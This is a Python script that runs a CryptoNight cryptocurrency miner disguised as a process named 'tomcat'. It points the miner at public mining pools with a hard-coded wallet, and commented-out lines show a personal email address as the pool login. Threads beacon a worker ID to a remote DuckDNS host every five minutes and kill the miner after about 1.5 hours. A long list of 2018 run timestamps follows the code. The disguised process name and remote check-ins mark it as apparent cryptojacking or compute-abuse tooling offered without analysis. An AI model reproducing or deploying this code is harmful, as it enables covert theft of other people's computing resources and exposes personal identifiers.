import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:01.411259
#2018-02-17 17:28:01.777245
#2018-02-17 19:16:03.840329
#2018-02-17 21:06:01.829566
#2018-02-17 22:49:07.589937
#2018-02-18 00:34:07.292649
#2018-02-18 02:24:06.313378
#2018-02-18 04:11:01.460282
#2018-02-18 06:02:07.001920
#2018-02-18 07:53:06.098958
#2018-02-18 09:40:03.466635
#2018-02-18 11:26:04.697274
#2018-02-18 13:12:06.690112
#2018-02-18 15:01:07.511425
#2018-02-18 16:49:03.992330
#2018-02-18 18:37:01.768146
#2018-02-18 20:25:06.660072
#2018-02-18 22:11:06.014448
#2018-02-18 23:58:06.196925
#2018-02-19 01:44:05.360501
#2018-02-19 03:33:01.807701
#2018-02-19 05:17:06.816455
#2018-02-19 07:05:08.259418
#2018-02-19 08:54:01.655180
#2018-02-19 10:43:05.926500
#2018-02-19 12:31:08.981127
#2018-02-19 14:18:01.614787
#2018-02-19 16:06:06.210944
#2018-02-19 17:53:05.913851
#2018-02-19 19:39:07.171120
#2018-02-19 21:28:05.178344
#2018-02-19 23:14:01.835655
#2018-02-20 00:59:07.140503
#2018-02-20 02:48:04.115021
#2018-02-20 04:36:04.264649
#2018-02-20 06:19:07.352654
#2018-02-20 08:04:07.488310
#2018-02-20 09:49:06.656000
#2018-02-20 11:33:07.754385
#2018-02-20 13:19:01.317999
#2018-02-20 15:02:12.553069
#2018-02-20 16:46:10.269609
#2018-02-20 18:33:08.400703
#2018-02-20 20:24:07.627255
#2018-02-20 22:11:07.137214
#2018-02-20 23:51:03.382527
#2018-02-21 01:36:05.310673
#2018-02-21 03:24:07.958533
#2018-02-21 05:13:06.726751
#2018-02-21 07:02:07.885951
#2018-02-21 08:49:04.934733
#2018-02-21 10:36:08.986083
#2018-02-21 12:23:05.595714
#2018-02-21 14:11:08.470642
#2018-02-21 15:58:08.960594
#2018-02-21 17:50:12.788591
#2018-02-21 19:35:01.680858
#2018-02-21 21:22:05.770909
#2018-02-21 23:08:05.088456
#2018-02-22 00:55:09.126458
#2018-02-22 02:44:01.723047
#2018-02-22 04:30:08.619829
#2018-02-22 06:17:01.469000
#2018-02-22 08:03:04.585165
#2018-02-22 09:50:09.893926
#2018-02-22 11:35:10.421839
#2018-02-22 13:22:07.237832
#2018-02-22 15:10:07.428816
#2018-02-22 16:54:02.030815
#2018-02-22 18:42:03.965424
#2018-02-22 20:33:04.454669
#2018-02-22 22:18:05.112613
#2018-02-23 00:06:04.967995
#2018-02-23 01:55:06.622749
#2018-02-23 03:42:05.691006
#2018-02-23 05:26:07.050236
#2018-02-23 07:12:04.248575
#2018-02-23 09:17:05.547582
#2018-02-23 11:24:05.046331
#2018-02-23 13:14:08.841636
#2018-02-23 14:59:08.269460
#2018-02-23 16:48:04.742269
#2018-02-23 18:33:01.519876
#2018-02-23 20:23:03.875255
#2018-02-23 22:09:06.565082
#2018-02-23 23:56:06.451915
#2018-02-24 01:46:07.481182
#2018-02-24 03:34:02.233725
#2018-02-24 05:18:03.552471
#2018-02-24 07:06:03.918570
#2018-02-24 08:53:03.637462
#2018-02-24 10:53:07.205993
#2018-02-24 12:41:05.430685
#2018-02-24 14:29:01.410431
#2018-02-24 16:17:07.203273
#2018-02-24 18:11:04.483776
#2018-02-24 19:57:04.567880
#2018-02-24 21:41:05.811485
#2018-02-25 00:34:01.435085
#2018-02-25 04:19:03.832800
#2018-02-25 07:51:03.463167